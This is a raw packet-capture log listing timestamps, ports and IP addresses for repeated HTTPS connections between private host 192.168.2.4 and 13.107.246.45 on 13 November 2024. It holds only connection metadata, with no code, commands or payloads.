Nov 13, 2024 18:44:36.359468937 CET	49903	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.359476089 CET	443	49903	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.359560013 CET	443	49903	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.359625101 CET	49903	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.359785080 CET	49903	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.359792948 CET	443	49903	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.359802961 CET	49903	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.359807014 CET	443	49903	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.363408089 CET	49908	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.363423109 CET	443	49908	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.363452911 CET	443	49905	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.363481998 CET	49908	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.363483906 CET	443	49905	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.363524914 CET	443	49905	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.363558054 CET	49905	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.363627911 CET	49905	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.363636971 CET	49909	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.363724947 CET	443	49909	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.363805056 CET	49905	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.363809109 CET	49909	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.363848925 CET	443	49905	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.363878965 CET	49905	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.363895893 CET	443	49905	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.363912106 CET	49908	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.363920927 CET	443	49908	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.364099979 CET	49909	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.364139080 CET	443	49909	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.366451979 CET	49910	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.366461992 CET	443	49910	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.366529942 CET	49910	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.366664886 CET	49910	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.366673946 CET	443	49910	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.481641054 CET	443	49906	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.481808901 CET	443	49906	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.482012987 CET	49906	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.482098103 CET	49906	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.482098103 CET	49906	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.482140064 CET	443	49906	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.482177019 CET	443	49906	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.484745979 CET	49911	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.484833002 CET	443	49911	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.485100985 CET	49911	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.485101938 CET	49911	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.485235929 CET	443	49911	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.491097927 CET	443	49907	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.491478920 CET	49907	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.491542101 CET	443	49907	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.492038012 CET	49907	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.492053032 CET	443	49907	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.623882055 CET	443	49907	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.623956919 CET	443	49907	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.624133110 CET	49907	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.624222994 CET	49907	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.624222994 CET	49907	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.624264956 CET	443	49907	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.624303102 CET	443	49907	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.627137899 CET	49912	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.627226114 CET	443	49912	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.627393961 CET	49912	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.627553940 CET	49912	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.627576113 CET	443	49912	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:36.669673920 CET	49904	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:36.669742107 CET	443	49904	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.112258911 CET	443	49909	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.112766027 CET	49909	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.112787962 CET	443	49909	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.113383055 CET	49909	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.113389015 CET	443	49909	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.119013071 CET	443	49908	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.119292974 CET	49908	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.119308949 CET	443	49908	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.119523048 CET	443	49910	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.119745016 CET	49910	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.119750977 CET	443	49910	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.119796038 CET	49908	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.119800091 CET	443	49908	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.120182991 CET	49910	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.120186090 CET	443	49910	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.230863094 CET	443	49911	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.231390953 CET	49911	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.231452942 CET	443	49911	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.231889963 CET	49911	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.231945992 CET	443	49911	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.245660067 CET	443	49909	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.245696068 CET	443	49909	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.245974064 CET	49909	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.246320009 CET	49909	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.246320009 CET	49909	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.246402979 CET	443	49909	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.246442080 CET	443	49909	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.248821974 CET	443	49908	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.248980045 CET	443	49908	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.249033928 CET	49908	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.249104977 CET	49908	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.249119997 CET	443	49908	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.249129057 CET	49908	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.249135017 CET	443	49908	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.249329090 CET	49913	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.249375105 CET	443	49913	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.249439955 CET	49913	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.249547958 CET	49913	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.249557018 CET	443	49913	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.251307011 CET	49914	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.251415968 CET	443	49914	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.251490116 CET	49914	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.251583099 CET	49914	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.251610041 CET	443	49914	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.253892899 CET	443	49910	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.254040003 CET	443	49910	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.254096985 CET	49910	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.254129887 CET	49910	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.254129887 CET	49910	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.254134893 CET	443	49910	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.254142046 CET	443	49910	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.256392002 CET	49915	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.256405115 CET	443	49915	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.256500959 CET	49915	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.256617069 CET	49915	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.256633997 CET	443	49915	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.366322041 CET	443	49911	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.366404057 CET	443	49911	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.366470098 CET	49911	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.366487980 CET	443	49911	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.366507053 CET	443	49911	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.366561890 CET	49911	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.366682053 CET	49911	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.366688967 CET	443	49911	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.366698980 CET	49911	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.366703033 CET	443	49911	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.369473934 CET	49916	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.369570017 CET	443	49916	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.369693041 CET	49916	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.369817972 CET	49916	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.369838953 CET	443	49916	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.370953083 CET	443	49912	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.371331930 CET	49912	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.371370077 CET	443	49912	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.371884108 CET	49912	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.371896982 CET	443	49912	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.526261091 CET	443	49912	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.526408911 CET	443	49912	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.526484966 CET	49912	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.526566029 CET	49912	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.526566029 CET	49912	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.526607037 CET	443	49912	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.526633978 CET	443	49912	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.528485060 CET	49917	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.528520107 CET	443	49917	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:37.528587103 CET	49917	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.528726101 CET	49917	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:37.528736115 CET	443	49917	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.015520096 CET	443	49914	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.018961906 CET	443	49915	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.020401955 CET	443	49913	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.040638924 CET	49914	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.040752888 CET	443	49914	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.041241884 CET	49914	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.041299105 CET	443	49914	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.041560888 CET	49915	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.041625023 CET	443	49915	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.042048931 CET	49915	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.042104959 CET	443	49915	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.042202950 CET	49913	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.042237043 CET	443	49913	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.042797089 CET	49913	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.042851925 CET	443	49913	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.127211094 CET	443	49916	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.130868912 CET	49916	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.130954027 CET	443	49916	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.131217957 CET	49916	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.131232977 CET	443	49916	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.169941902 CET	443	49915	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.169971943 CET	443	49915	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.170017958 CET	443	49915	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.170094013 CET	49915	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.170094013 CET	49915	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.172068119 CET	443	49914	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.172230005 CET	443	49913	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.172457933 CET	49915	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.172457933 CET	49915	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.172527075 CET	443	49915	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.172561884 CET	443	49915	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.172851086 CET	443	49913	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.172859907 CET	443	49914	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.172954082 CET	443	49913	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.173042059 CET	49913	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.173042059 CET	49913	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.173078060 CET	49914	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.174571991 CET	49914	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.174571991 CET	49914	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.174640894 CET	443	49914	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.174676895 CET	443	49914	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.174973965 CET	49913	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.174973965 CET	49913	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.175015926 CET	443	49913	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.175045967 CET	443	49913	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.177575111 CET	49918	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.177611113 CET	443	49918	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.177670002 CET	49918	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.178921938 CET	49919	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.178958893 CET	443	49919	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.179049969 CET	49919	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.179490089 CET	49918	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.179505110 CET	443	49918	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.179661036 CET	49919	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.179682016 CET	443	49919	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.180870056 CET	49920	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.180963993 CET	443	49920	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.181062937 CET	49920	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.181186914 CET	49920	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.181225061 CET	443	49920	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.259134054 CET	443	49916	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.259305954 CET	443	49916	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.259413958 CET	49916	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.259496927 CET	49916	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.259496927 CET	49916	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.259538889 CET	443	49916	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.259567022 CET	443	49916	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.261322975 CET	49921	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.261383057 CET	443	49921	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.261476994 CET	49921	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.261576891 CET	49921	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.261594057 CET	443	49921	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.281806946 CET	443	49917	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.282130957 CET	49917	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.282172918 CET	443	49917	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.282676935 CET	49917	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.282685995 CET	443	49917	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.415157080 CET	443	49917	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.415235996 CET	443	49917	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.415374041 CET	443	49917	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.415420055 CET	49917	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.415461063 CET	49917	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.415590048 CET	49917	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.415611982 CET	443	49917	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.415627956 CET	49917	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.415635109 CET	443	49917	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.418039083 CET	49922	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.418137074 CET	443	49922	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.418236971 CET	49922	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.418353081 CET	49922	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.418373108 CET	443	49922	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.918924093 CET	443	49920	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.919433117 CET	49920	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.919465065 CET	443	49920	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.920123100 CET	49920	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.920130014 CET	443	49920	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.946860075 CET	443	49918	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.947344065 CET	49918	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.947401047 CET	443	49918	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.947700977 CET	49918	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.947715044 CET	443	49918	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.964298964 CET	443	49919	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.964716911 CET	49919	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.964750051 CET	443	49919	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:38.965235949 CET	49919	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:38.965245008 CET	443	49919	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.000155926 CET	443	49921	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.000503063 CET	49921	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.000534058 CET	443	49921	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.000725031 CET	49921	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.000735044 CET	443	49921	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.049844027 CET	443	49920	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.049901009 CET	443	49920	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.050029039 CET	443	49920	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.050215006 CET	49920	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.050215006 CET	49920	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.050461054 CET	49920	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.050461054 CET	49920	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.050496101 CET	443	49920	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.050513029 CET	443	49920	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.053386927 CET	49923	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.053478956 CET	443	49923	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.053853989 CET	49923	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.053853989 CET	49923	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.053992033 CET	443	49923	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.089977980 CET	443	49918	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.090383053 CET	443	49918	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.090523005 CET	49918	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.091418982 CET	49918	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.091418982 CET	49918	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.091461897 CET	443	49918	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.091490984 CET	443	49918	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.092859030 CET	49924	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.092894077 CET	443	49924	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.092957973 CET	49924	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.093081951 CET	49924	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.093092918 CET	443	49924	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.118335009 CET	443	49919	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.118351936 CET	443	49919	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.118402958 CET	443	49919	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.118473053 CET	49919	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.118717909 CET	49919	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.118948936 CET	49919	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.118948936 CET	49919	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.118982077 CET	443	49919	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.119004965 CET	443	49919	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.121069908 CET	49925	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.121159077 CET	443	49925	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.121248007 CET	49925	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.121319056 CET	49925	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.121336937 CET	443	49925	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.132687092 CET	443	49921	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.133725882 CET	443	49921	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.133825064 CET	49921	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.133861065 CET	443	49921	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.133950949 CET	49921	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.133950949 CET	49921	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.133972883 CET	443	49921	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.134059906 CET	443	49921	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.136181116 CET	49926	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.136208057 CET	443	49926	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.136272907 CET	49926	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.136379957 CET	49926	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.136389971 CET	443	49926	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.379924059 CET	443	49922	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.380464077 CET	49922	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.380553961 CET	443	49922	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.381026983 CET	49922	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.381042004 CET	443	49922	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.522154093 CET	443	49922	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.522314072 CET	443	49922	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.522483110 CET	49922	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.522483110 CET	49922	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.522526026 CET	49922	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.522546053 CET	443	49922	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.525409937 CET	49927	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.525497913 CET	443	49927	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.525609970 CET	49927	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.525938034 CET	49927	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.526029110 CET	443	49927	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.787009954 CET	443	49923	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.787635088 CET	49923	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.787727118 CET	443	49923	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.788228035 CET	49923	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.788284063 CET	443	49923	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.857476950 CET	443	49924	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.857798100 CET	49924	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:39.857815027 CET	443	49924	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:39.858159065 CET	49924	443	192.168.2.4	13.107.246.45
